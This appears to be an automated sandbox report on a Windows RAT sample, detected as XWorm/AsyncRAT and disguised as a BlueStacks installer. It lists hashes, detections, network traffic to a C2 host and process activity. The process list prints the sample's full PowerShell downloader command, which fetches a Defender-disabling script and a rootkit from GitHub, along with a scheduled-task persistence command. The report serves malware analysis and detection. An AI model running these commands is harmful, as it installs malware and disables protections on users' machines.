                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exe, Author: ditekSHen
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 76%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....8.g............................>.... ........@.. .......................@............@.....................................S............................ ....................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................ .......H...........8y......&.....................................................(....*.r...p*. ..e.*..(....*.r...p*. *p{.*.s.........s.........s.........s.........*.r;..p*. S...*.r[..p*. ...*.ro..p*. .(T.*.r...p*. ....*.r...p*..()...*.rO..p*. .8F.*.rc..p*. .O..*.(*...-.(+...,.+.(,...,.+.()...,.+.((...,..(G...*.+5sY... .... ....oZ...(....~....-.(N...(H...~....o[...&.-.*.r$..p*. ....*.r8..p*.rN..p*.rf..p*. f.P.*.r|..p*. u...*.r...p*. ....*.r...p*.r...p*. ....*.r...p*. E/..*.r...p*.
                                                                  Process:C:\Users\user\Desktop\svchost.exe.bin.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:modified
                                                                  Size (bytes):26
                                                                  Entropy (8bit):3.95006375643621
                                                                  Encrypted:false
                                                                  SSDEEP:3:ggPYV:rPYV
                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                  Malicious:true
                                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Entropy (8bit):5.575024304396373
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                  • Windows Screen Saver (13104/52) 0.07%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  File name:svchost.exe.bin.exe
                                                                  File size:59'392 bytes
                                                                  MD5:2b42433cc8d3450d015d04a3c8662558
                                                                  SHA1:0932042702ed80152a37c564aeb2114dc48dd3af
                                                                  SHA256:075151678431e9ed1a6f26563f7a2143517bec7741c6dc53a106fbad4fe2d41a
                                                                  SHA512:880a4975cf19cd5ee71a4385f5ec786018d3416addb5a3f21a863614c85490521ccbffab762f2dbc04b2873d53b9e9d5c8dd34fa4b1892bd76a057c9e61db254
                                                                  SSDEEP:1536:WWsAalSKXHuSQRh5FgrbsN/+zn/QbOXTP:WWsAawK3+5FIbsMz/QbOr
                                                                  TLSH:2E43E848E7E60124D8FF5BB5187B03068239B9A75817CA5F7CD401EE2763B858691FE3
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....8.g............................>.... ........@.. .......................@............@................................
                                                                  Icon Hash:90cececece8e8eb0
                                                                  Entrypoint:0x40fc3e
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x67CC38FF [Sat Mar 8 12:33:03 2025 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                  Instruction
                                                                  jmp dword ptr [00402000h]
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xfbe80x53.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x100000x5da.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x120000xc.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x20000xdc440xde00f9867f5b91ea249fc7c3c957aff3350bFalse0.4288605011261261data5.645627225127565IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rsrc0x100000x5da0x60096c567cbf21555d4f090e3c4122e453dFalse0.4296875data4.184423442471172IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0x120000xc0x20058ee1032f6af482ce652886dbcd7809cFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  RT_VERSION0x100a00x350data0.43514150943396224
                                                                  RT_MANIFEST0x103f00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041
                                                                  DLLImport
                                                                  mscoree.dll_CorExeMain
                                                                  DescriptionData
                                                                  Translation0x0000 0x04b0
                                                                  CompanyNamenow.gg, Inc.
                                                                  FileDescriptionBlueStacks Setup
                                                                  FileVersion19.0.0.0
                                                                  InternalNamesvchost.exe
                                                                  LegalCopyrightCopyright (c) 2010-2021 Bluestacks from Now.gg, Inc.
                                                                  OriginalFilenamesvchost.exe
                                                                  ProductNameBlueStacks 5
                                                                  ProductVersion19.0.0.0
                                                                  Assembly Version19.0.0.0
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Mar 10, 2025 19:44:56.458156109 CET4969980192.168.2.11208.95.112.1
                                                                  Mar 10, 2025 19:44:56.463320971 CET8049699208.95.112.1192.168.2.11
                                                                  Mar 10, 2025 19:44:56.463429928 CET4969980192.168.2.11208.95.112.1
                                                                  Mar 10, 2025 19:44:56.465131044 CET4969980192.168.2.11208.95.112.1
                                                                  Mar 10, 2025 19:44:56.470129967 CET8049699208.95.112.1192.168.2.11
                                                                  Mar 10, 2025 19:44:57.048036098 CET8049699208.95.112.1192.168.2.11
                                                                  Mar 10, 2025 19:44:57.095179081 CET4969980192.168.2.11208.95.112.1
                                                                  Mar 10, 2025 19:45:00.427098036 CET49703443192.168.2.11140.82.121.3
                                                                  Mar 10, 2025 19:45:00.427144051 CET44349703140.82.121.3192.168.2.11
                                                                  Mar 10, 2025 19:45:00.427247047 CET49703443192.168.2.11140.82.121.3
                                                                  Mar 10, 2025 19:45:00.435686111 CET49703443192.168.2.11140.82.121.3
                                                                  Mar 10, 2025 19:45:00.435703039 CET44349703140.82.121.3192.168.2.11
                                                                  Mar 10, 2025 19:45:42.723191023 CET8049699208.95.112.1192.168.2.11
                                                                  Mar 10, 2025 19:45:42.723304033 CET4969980192.168.2.11208.95.112.1
                                                                  Mar 10, 2025 19:46:37.071588039 CET4969980192.168.2.11208.95.112.1
                                                                  Mar 10, 2025 19:46:37.076771021 CET8049699208.95.112.1192.168.2.11
                                                                  Mar 10, 2025 19:46:40.421698093 CET49703443192.168.2.11140.82.121.3
                                                                  Mar 10, 2025 19:46:40.464370012 CET44349703140.82.121.3192.168.2.11
                                                                  Mar 10, 2025 19:46:48.444798946 CET4970824196192.168.2.11147.185.221.26
                                                                  Mar 10, 2025 19:46:48.449959993 CET2419649708147.185.221.26192.168.2.11
                                                                  Mar 10, 2025 19:46:48.450052023 CET4970824196192.168.2.11147.185.221.26
                                                                  Mar 10, 2025 19:46:48.483649015 CET4970824196192.168.2.11147.185.221.26
                                                                  Mar 10, 2025 19:46:48.488770008 CET2419649708147.185.221.26192.168.2.11
                                                                  Mar 10, 2025 19:46:50.312654018 CET49709443192.168.2.11185.199.108.133
                                                                  Mar 10, 2025 19:46:50.312688112 CET44349709185.199.108.133192.168.2.11
                                                                  Mar 10, 2025 19:46:50.312752008 CET49709443192.168.2.11185.199.108.133
                                                                  Mar 10, 2025 19:46:50.319447994 CET49709443192.168.2.11185.199.108.133
                                                                  Mar 10, 2025 19:46:50.319466114 CET44349709185.199.108.133192.168.2.11
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Mar 10, 2025 19:44:56.436192989 CET6459953192.168.2.111.1.1.1
                                                                  Mar 10, 2025 19:44:56.443312883 CET53645991.1.1.1192.168.2.11
                                                                  Mar 10, 2025 19:45:00.415647030 CET5958553192.168.2.111.1.1.1
                                                                  Mar 10, 2025 19:45:00.422761917 CET53595851.1.1.1192.168.2.11
                                                                  Mar 10, 2025 19:46:48.428544998 CET5026153192.168.2.111.1.1.1
                                                                  Mar 10, 2025 19:46:48.444160938 CET53502611.1.1.1192.168.2.11
                                                                  Mar 10, 2025 19:46:50.303493023 CET5307653192.168.2.111.1.1.1
                                                                  Mar 10, 2025 19:46:50.310887098 CET53530761.1.1.1192.168.2.11
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Mar 10, 2025 19:44:56.436192989 CET192.168.2.111.1.1.10xfa58Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                  Mar 10, 2025 19:45:00.415647030 CET192.168.2.111.1.1.10x3142Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                  Mar 10, 2025 19:46:48.428544998 CET192.168.2.111.1.1.10x60c9Standard query (0)group-coupon.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                                  Mar 10, 2025 19:46:50.303493023 CET192.168.2.111.1.1.10x9f2dStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Mar 10, 2025 19:44:56.443312883 CET1.1.1.1192.168.2.110xfa58No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                  Mar 10, 2025 19:45:00.422761917 CET1.1.1.1192.168.2.110x3142No error (0)github.com140.82.121.3A (IP address)IN (0x0001)false
                                                                  Mar 10, 2025 19:46:48.444160938 CET1.1.1.1192.168.2.110x60c9No error (0)group-coupon.gl.at.ply.gg147.185.221.26A (IP address)IN (0x0001)false
                                                                  Mar 10, 2025 19:46:50.310887098 CET1.1.1.1192.168.2.110x9f2dNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                  Mar 10, 2025 19:46:50.310887098 CET1.1.1.1192.168.2.110x9f2dNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                  Mar 10, 2025 19:46:50.310887098 CET1.1.1.1192.168.2.110x9f2dNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                  Mar 10, 2025 19:46:50.310887098 CET1.1.1.1192.168.2.110x9f2dNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                  • ip-api.com
                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.1149699208.95.112.1806992C:\Users\user\Desktop\svchost.exe.bin.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Mar 10, 2025 19:44:56.465131044 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                  Host: ip-api.com
                                                                  Connection: Keep-Alive
                                                                  Mar 10, 2025 19:44:57.048036098 CET175INHTTP/1.1 200 OK
                                                                  Date: Mon, 10 Mar 2025 18:44:56 GMT
                                                                  Content-Type: text/plain; charset=utf-8
                                                                  Content-Length: 6
                                                                  Access-Control-Allow-Origin: *
                                                                  X-Ttl: 60
                                                                  X-Rl: 44
                                                                  Data Raw: 66 61 6c 73 65 0a
                                                                  Data Ascii: false


                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Click to dive into process behavior distribution

                                                                  Click to jump to process

                                                                  Target ID:0
                                                                  Start time:14:44:52
                                                                  Start date:10/03/2025
                                                                  Path:C:\Users\user\Desktop\svchost.exe.bin.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\Desktop\svchost.exe.bin.exe"
                                                                  Imagebase:0xaa0000
                                                                  File size:59'392 bytes
                                                                  MD5 hash:2B42433CC8D3450D015D04A3C8662558
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1172627223.0000000000AA2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1172627223.0000000000AA2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                  Reputation:low
                                                                  Has exited:false

                                                                  Target ID:3
                                                                  Start time:14:44:56
                                                                  Start date:10/03/2025
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }"
                                                                  Imagebase:0x7ff7d9540000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:4
                                                                  Start time:14:44:56
                                                                  Start date:10/03/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff650920000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:13
                                                                  Start time:14:46:44
                                                                  Start date:10/03/2025
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "svchost.exe.bin" /tr "C:\Users\user\AppData\Roaming\svchost.exe.bin.exe"
                                                                  Imagebase:0x7ff7f6780000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:14
                                                                  Start time:14:46:44
                                                                  Start date:10/03/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff650920000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:15
                                                                  Start time:14:46:46
                                                                  Start date:10/03/2025
                                                                  Path:C:\Users\user\AppData\Roaming\svchost.exe.bin.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Users\user\AppData\Roaming\svchost.exe.bin.exe
                                                                  Imagebase:0xde0000
                                                                  File size:59'392 bytes
                                                                  MD5 hash:2B42433CC8D3450D015D04A3C8662558
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exe, Author: Joe Security
                                                                  • Rule: rat_win_xworm_v2, Description: Finds XWorm v2 samples based on characteristic strings, Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exe, Author: Sekoia.io
                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exe, Author: ditekSHen
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Avira
                                                                  • Detection: 76%, ReversingLabs
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:18.9%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:100%
                                                                    Total number of Nodes:3
                                                                    Total number of Limit Nodes:0
                                                                    execution_graph 3181 7ffabc406981 3182 7ffabc4069ce CheckRemoteDebuggerPresent 3181->3182 3184 7ffabc406a3f 3182->3184

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2418527747.00007FFABC400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFABC400000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffabc400000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: CheckDebuggerPresentRemote
                                                                    • String ID:
                                                                    • API String ID: 3662101638-0
                                                                    • Opcode ID: 77c12f8b9e1fdd482c2f7e15c8958dd5b5ac11cd1a8fd9a6f3ea6f61c85c100c
                                                                    • Instruction ID: 9cb2f95ad35fc114110211891caecab9679eb351bc881a017943dc0b3b5ee3f6